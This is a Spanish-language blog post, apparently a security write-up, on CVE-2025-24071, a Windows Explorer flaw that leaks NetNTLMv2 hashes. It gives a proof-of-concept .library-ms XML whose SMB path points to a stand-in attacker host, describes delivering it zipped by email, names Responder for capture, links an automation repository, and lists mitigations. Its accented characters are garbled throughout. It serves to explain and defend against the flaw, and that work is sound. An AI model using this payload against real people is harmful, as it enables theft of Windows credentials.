CVE-2025-24071

main_image

Introducci贸n

CVE-2025-24071 es una vulnerabilidad cr铆tica en el Explorador de Windows que permite la captura de credenciales netNTLMv2 sin interacci贸n del usuario. Esta vulnerabilidad se explota mediante un archivo malicioso .library-ms contenido dentro de un archivo ZIP, lo que provoca que Windows inicie autom谩ticamente una conexi贸n SMB a un servidor controlado por un atacante, exponiendo las credenciales del usuario.

Descripci贸n de la vulnerabilidad

El problema radica en c贸mo el Explorador de Windows maneja archivos .library-ms dentro de archivos ZIP. Cuando un usuario descomprime un archivo ZIP con un .library-ms malicioso, el sistema trata autom谩ticamente de acceder a una ubicaci贸n SMB especificada en el archivo, enviando las credenciales netNTLMv2 al atacante sin necesidad de que la v铆ctima interact煤e con el archivo.

驴Qu茅 es un archivo .library-ms?

Un archivo con extensi贸n .library-ms es un archivo XML que define una biblioteca en Windows. Las bibliotecas en Windows permiten agrupar y mostrar en una 煤nica vista archivos que est谩n ubicados en distintas carpetas o discos, facilitando el acceso y la organizaci贸n de documentos, im谩genes, m煤sica, etc. Estos archivos contienen informaci贸n sobre el nombre de la biblioteca, su icono, las rutas (ubicaciones) que incluye, y otros detalles de configuraci贸n. Normalmente, Windows gestiona estos archivos de forma autom谩tica y se ubican en la carpeta de bibliotecas del usuario (por ejemplo, en %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Libraries).

驴Qu茅 es un hash NetNTLMv2?

Un hash NetNTLMv2 es el valor generado durante el proceso de autenticaci贸n basado en el protocolo NTLMv2 de Microsoft. En este mecanismo de autenticaci贸n challenge鈥搑esponse, el servidor env铆a un reto (challenge) al cliente, y este 煤ltimo responde generando un hash que combina dicho reto, la contrase帽a del usuario (o su hash) y otros datos espec铆ficos. Esto permite validar la identidad del usuario sin transmitir la contrase帽a en texto claro por la red.

Aunque NetNTLMv2 ofrece mejoras en seguridad respecto a su versi贸n anterior (NTLMv1), si un atacante consigue capturar este hash (por ejemplo, mediante t茅cnicas de sniffing o a trav茅s de otros vectores de ataque), podr铆a intentar romperlo mediante m茅todos como la fuerza bruta o ataques de diccionario para recuperar la contrase帽a original.

Prueba de Concepto (PoC)

1. Creaci贸n del archivo malicioso

El atacante genera un archivo con extensi贸n .library-ms con el siguiente contenido XML:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\IP_DEL_ATACANTE\recurso</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Este archivo se comprime en un ZIP y se distribuye a la v铆ctima a trav茅s de correo electr贸nico, redes sociales o cualquier otro medio.

2. Ejecuci贸n del ataque

  • La v铆ctima descomprime el archivo ZIP en su sistema.
  • Windows procesa autom谩ticamente el archivo .library-ms.
  • Se inicia una conexi贸n SMB a la direcci贸n especificada (\\IP_DEL_ATACANTE\recurso).
  • El servidor del atacante captura las credenciales netNTLMv2 utilizando herramientas como Responder.

Puedes crear el comprimido de forma automatizada utilizando este repositorio de Github: https://github.com/rubbxalc/CVE-2025-24071

Mitigaci贸n

Para prevenir la explotaci贸n de CVE-2025-24071, se recomienda:

  • Aplicar actualizaciones de seguridad proporcionadas por Microsoft.
  • Deshabilitar conexiones SMB salientes no autorizadas mediante pol铆ticas de grupo.
  • Configurar reglas de firewall para bloquear conexiones SMB a servidores externos.
  • Utilizar soluciones de seguridad actualizadas y realizar monitoreo activo para detectar actividad sospechosa.
CVE-2025-24071 | Rubbx